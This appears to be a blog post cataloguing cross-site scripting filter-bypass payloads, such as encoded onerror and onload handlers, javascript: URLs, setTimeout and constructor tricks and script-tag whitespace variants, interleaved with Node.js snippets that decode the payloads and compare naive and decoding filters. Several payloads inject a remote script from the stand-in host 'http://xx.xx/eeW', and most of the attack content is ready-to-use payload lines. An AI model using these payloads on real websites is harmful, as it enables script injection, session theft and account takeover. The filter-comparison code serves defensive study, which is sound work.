L1e’s blog
XSS bypass
Published on 2019-10-12
https://www.anquanke.com/post/id/176185
https://www.anquanke.com/post/id/176300
https://www.anquanke.com/post/id/176482
Inside an HTML tag, only an attribute's value is HTML-decoded (character references such as &#x61; or &#97; are resolved before the value is used); the tag name and attribute names are taken literally.
Decoded: a character reference inside a quoted or unquoted attribute value.
Not decoded: <a text="scr" "ipt"> is not joined into one value; after the closing quote the parser starts a new attribute, named "ipt".
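As an added example (not code from the original post), a small decoder for HTML character references and a check that shows why a filter must decode attribute values before matching on them, plus a rough attribute tokenizer that shows the split-attribute case. The entity subset, the sample tags and the `alert(` pattern are assumptions made for the demonstration; the decoder is deliberately liberal (numeric references with or without `;`), which is the safe direction for a filter.

```javascript
// Added example, not from the original post. Node.js, no dependencies.
// Shows the HTML-layer rule above: attribute values are character-reference
// decoded before the browser compiles them, so a filter must decode too.

// Assumption: a small subset of the ~2200 named references, enough for the
// demonstration. A production filter should use the full HTML table.
const NAMED = {
  amp: '&', lt: '<', gt: '>', quot: '"', apos: "'",
  colon: ':', sol: '/', lpar: '(', rpar: ')', Tab: '\t', NewLine: '\n',
};
// Legacy names that browsers also decode without a trailing semicolon.
const LEGACY_NO_SEMI = new Set(['amp', 'lt', 'gt', 'quot']);
const hasOwn = (o, k) => Object.prototype.hasOwnProperty.call(o, k);

// Decode character references the way the tokenizer does in attribute values:
// &#97; &#x61; &#X61; (semicolon optional) and named references (semicolon
// required except for the legacy set). Unknown references are left as-is.
function decodeHtmlRefs(s) {
  return s.replace(
    /&(?:#[xX]([0-9a-fA-F]+);?|#([0-9]+);?|([A-Za-z][A-Za-z0-9]*);?)/g,
    (m, hex, dec, name) => {
      if (hex !== undefined || dec !== undefined) {
        let cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
        // NUL, surrogates and out-of-range values become U+FFFD, as in browsers.
        if (cp === 0 || cp > 0x10ffff || (cp >= 0xd800 && cp <= 0xdfff)) cp = 0xfffd;
        return String.fromCodePoint(cp);
      }
      if (hasOwn(NAMED, name) && (m.endsWith(';') || LEGACY_NO_SEMI.has(name))) return NAMED[name];
      return m;
    });
}

// Extract one attribute's raw (undecoded) value from a start tag: double-
// quoted, single-quoted or unquoted. Assumption: the input is a single tag.
function rawAttr(tag, name) {
  const re = new RegExp(
    '[\\s/]' + name + '\\s*=\\s*(?:"([^"]*)"|\'([^\']*)\'|([^\\s>]+))', 'i');
  const m = re.exec(tag);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// The handler source the browser actually compiles: the decoded value.
function handlerSource(tag, attr) {
  const raw = rawAttr(tag, attr);
  return raw === null ? null : decodeHtmlRefs(raw);
}

// Rough list of attribute names in a start tag, tokenizer-style: a name is any
// run that is not whitespace, '/', '>' or '='; quote characters are allowed.
function attrNames(tag) {
  const names = [];
  const body = tag.replace(/^<[^\s/>]+/, '');  // drop '<tagname'
  const re = /[\s/]+([^\s/>=]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?/g;
  let m;
  while ((m = re.exec(body)) !== null) names.push(m[1]);
  return names;
}

// Two filters for the same pattern: one on raw markup, one after decoding.
// Decoding the whole tag is more than the browser does (tag and attribute
// names stay literal) but errs on the side of catching more.
function naiveBlocks(tag) { return /alert\s*\(/i.test(tag); }
function decodingBlocks(tag) { return /alert\s*\(/i.test(decodeHtmlRefs(tag)); }

// Constructed samples (not from the post): one handler written three ways,
// plus the split-attribute case, which the parser does NOT join.
const SAMPLES = [
  '<img src=x onerror="alert(1)">',
  '<img src=x onerror="&#x61;lert(1)">',
  '<img src=x onerror=&#97;&#108;&#101;&#114;&#116;&#40;1&#41;>',
  '<a text="scr" "ipt">',
];

for (const tag of SAMPLES) {
  console.log(tag, '->', handlerSource(tag, 'onerror'), attrNames(tag),
    'naive:', naiveBlocks(tag), 'decoding:', decodingBlocks(tag));
}
```

The naive filter only catches the first sample; the decoding filter catches all three handler spellings. For the fourth tag the attribute list comes back as `text` and `"ipt"`, which is the "not decoded" case above.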
Common payloads:
Payload triggered by pressing Alt+Shift+X (the accesskey shortcut)
Using comments
<svg/onauxClick%3D"alert`HackerOne`
">
<img/src="1"/onerror=alert(1)>
<img src=1 onerror=location='javascript:%61%6C%65%72%74%28%31%29'>
<img src=1 onerror=location='javascript:\x61\x6C\x65\x72\x74\x28\x31\x29'>
<img src=1 onerror=location="javascr"+"ipt:"+"%61%6C%65%72%74%28%31%29">
(For a javascript: URL the browser percent-decodes the body before running it, and \x escapes inside a JS string literal are resolved when the literal is parsed, so both spellings reach the engine as alert(1).)
Writing onload=['java','script:','alert(1)'].join('') directly does not work: the handler merely evaluates to the string "javascript:alert(1)" and nothing executes it. The string has to be handed to something that runs code, such as location or a timer:
setTimeout("location=['javascript:al','ert()'].join('')")
setTimeout and setInterval take the code (or function) to execute:
<svg/onload=setInterval('al'%2b'ert(1)')>
<svg/onload=setTimeout`alert(1)`>
<svg/onload=setTimeout`alert\u00281\u0029`>
(Tagged-template call, no parentheses needed: setTimeout receives an array of strings, stringifies it to alert(1) and evaluates that; the \u escapes are resolved inside the template literal first.)
Splitting and encoding
<svg/onload=\u0073etInterval(appendChild(createElement('script')).src='http://xx.xx/eeW')>
<svg/onload=\u0073etInterval(appendChild(createElement('sc\162ipt')).src='http://xx.xx/eeW')>
<svg/onload=\u0073etInterval(appendChild(createElement('scr'%2b'ipt')).src='http://xx.xx/eeW')>
<svg/onload=\u0073etInterval(\u0061ppendChild(\u0063reateElement('scr'%2b'ipt')).src='http://xx.xx/eeW')>
(\u0073etInterval is a Unicode escape inside an identifier, which JavaScript allows; 'sc\162ipt' is an octal escape in a string; %2b is a URL-encoded +. createElement and appendChild resolve through the event handler's scope chain, which includes the element and document, so no document. prefix is needed.)
Combined with functions:
<svg/onload=Set.constructor('\u0061\u006C'%2b'\u0065\u0072\u0074\u0028\u0031\u0029')()>
<svg/onload=Set.constructor`al\x65rt\x28/xss/\x29```>
<svg/onload=Map.constructor`al\x65rt\x28/xss/\x29```>
<svg/onload=clear.constructor`al\x65rt\x28/xss/\x29```>
<svg/onload=Array.constructor`al\x65rt\x28/xss/\x29```>
<svg/onload=WeakSet.constructor`al\x65rt\x28/xss/\x29```>
(Every built-in constructor is itself a function, so X.constructor is Function, reachable without writing the word "Function"; clear resolves to document.clear through the handler's scope chain. The first backtick pair builds the function body from the template strings, and the trailing empty pair calls the resulting function.)
Using arrays
map
[1].map(alert): [1] supplies the argument, alert is the function called for each element.
find, every, filter, forEach and findIndex work the same way as map: each calls the callback with the element as its first argument.
<img src=x onerror=location=['javascript:[1]','.map','(al','ert)'].join('')>
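As an added example (not code from the original post), the JavaScript-layer tricks from the sections above (percent-encoded javascript: URLs, \x and \u escapes, join()ed fragments passed to a timer, tagged-template calls, Unicode escapes in identifiers, .constructor as a route to Function, and array iteration methods) run in Node against a recording alert(). runJavascriptUrl, browserTimer and the location setter are stand-ins for browser behaviour (assumptions, not browser code): they evaluate immediately instead of navigating or scheduling, because Node's own timers refuse string arguments.

```javascript
// Added example, not from the original post. Node.js, no dependencies.
// Runs the JavaScript-layer tricks from this section against a recording
// alert(). runJavascriptUrl, browserTimer and the `location` setter are
// stand-ins (assumptions) for what a browser does.

const calls = [];
globalThis.alert = (...args) => { calls.push(String(args[0])); };

// javascript: navigation: drop the scheme, percent-decode, run as global code.
function runJavascriptUrl(url) {
  if (!/^javascript:/i.test(url)) throw new Error('not a javascript: URL');
  return (0, eval)(decodeURIComponent(url.slice('javascript:'.length)));
}
// Assigning to location triggers the navigation above (stand-in for the browser).
Object.defineProperty(globalThis, 'location', {
  set: (url) => { runJavascriptUrl(url); }, configurable: true,
});

// setTimeout/setInterval with a non-function argument: the argument is
// stringified and compiled as code. Evaluates at once instead of scheduling.
function browserTimer(code) {
  return (0, eval)(String(code));
}

function demo() {
  calls.length = 0;

  // javascript: URL assembled from pieces; %61%6C... is decoded by the URL step
  runJavascriptUrl('javascr' + 'ipt:' + '%61%6C%65%72%74%28%31%29');
  // \x escapes are resolved when the string literal is parsed, before the URL step
  runJavascriptUrl('javascript:\x61\x6C\x65\x72\x74\x28\x32\x29');
  // timer given a string that itself assigns location from join()ed fragments
  browserTimer("location=['javascript:al','ert(3)'].join('')");
  // tagged template: the timer gets ['alert(4)'], whose String() is the code
  browserTimer`alert(4)`;
  // \u escapes inside a template literal are cooked before stringification
  browserTimer`alert\u00285\u0029`;
  // Unicode escape in the identifier itself (\u0062 is 'b'), as in \u0073etInterval
  \u0062rowserTimer`alert(6)`;
  // Any built-in's .constructor is Function: body from a string ...
  Set.constructor('\u0061\u006C' + '\u0065\u0072\u0074\u0028\u0037\u0029')();
  // ... or from a template; the trailing empty template calls the result
  Map.constructor`al\x65rt\x28/xss/\x29```;
  // Iteration methods call the callback with the element as its first argument
  [9].map(alert);
  ['ten'].forEach(alert);

  return calls.slice();
}

console.log(demo().join('\n'));
```

Each line of output is one alert() argument as the engine saw it after all decoding layers, which is the thing a filter that inspects the raw attribute never sees.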
Payloads:
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'"><\x3Cscript>javascript:alert(1)</script>
"><\x00script>javascript:alert(1)</script>
(\x20, \x09, \x0A, \x0C, \x0D, \x2F and \x3E are the characters the HTML tokenizer accepts immediately after a tag name, so a filter that expects a literal space after <script misses the rest. <\x3Cscript> is "<<script>": the first < is emitted as text and the second starts the tag. The NUL variant is a legacy-browser trick; a current HTML tokenizer does not treat <\x00script> as a tag.)
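As an added example (not code from the original post), a naive "<script " filter beside a tokenizer-aware one, run over constructed copies of the variants above. The inputs, the filter names and the simplified script bodies are assumptions made for the demonstration.

```javascript
// Added example, not from the original post. Node.js, no dependencies.
// Shows why a filter that looks for "<script " misses the variants above.

// Literal space only: the check many ad-hoc filters actually implement.
function naiveScriptFilter(html) {
  return /<script /i.test(html);
}

// The character class is the set the HTML tokenizer accepts right after a tag
// name: tab, LF, FF, CR, space, '/' and '>'. It also catches "<<script>".
function tokenizerAwareScriptFilter(html) {
  return /<script[\t\n\f\r />]/i.test(html);
}

// Constructed inputs mirroring the list above; the \x escapes are real bytes
// here. The NUL variant is included only to show it is not a tag to a modern
// tokenizer, so neither filter needs to match it.
const VARIANTS = {
  space:    '<script\x20type="text/javascript">alert(1);</script>',
  gt:       '<script\x3Etype="text/javascript">alert(1);</script>',
  cr:       '<script\x0Dtype="text/javascript">alert(1);</script>',
  tab:      '<script\x09type="text/javascript">alert(1);</script>',
  ff:       '<script\x0Ctype="text/javascript">alert(1);</script>',
  slash:    '<script\x2Ftype="text/javascript">alert(1);</script>',
  lf:       '<script\x0Atype="text/javascript">alert(1);</script>',
  doubleLt: '"><\x3Cscript>alert(1)</script>',
  nul:      '"><\x00script>alert(1)</script>',
};

// Run both filters over every variant and return the verdicts by name.
function compareFilters() {
  const out = {};
  for (const [name, html] of Object.entries(VARIANTS)) {
    out[name] = { naive: naiveScriptFilter(html), aware: tokenizerAwareScriptFilter(html) };
  }
  return out;
}

// Count how many variants each filter flags.
function hits(results, key) {
  return Object.values(results).filter((r) => r[key]).length;
}

const results = compareFilters();
console.table(results);
console.log('naive hits:', hits(results, 'naive'), 'aware hits:', hits(results, 'aware'));
```

The naive filter flags only the space variant; the tokenizer-aware one flags everything except the NUL form, which is the one a current browser would not parse as a tag either.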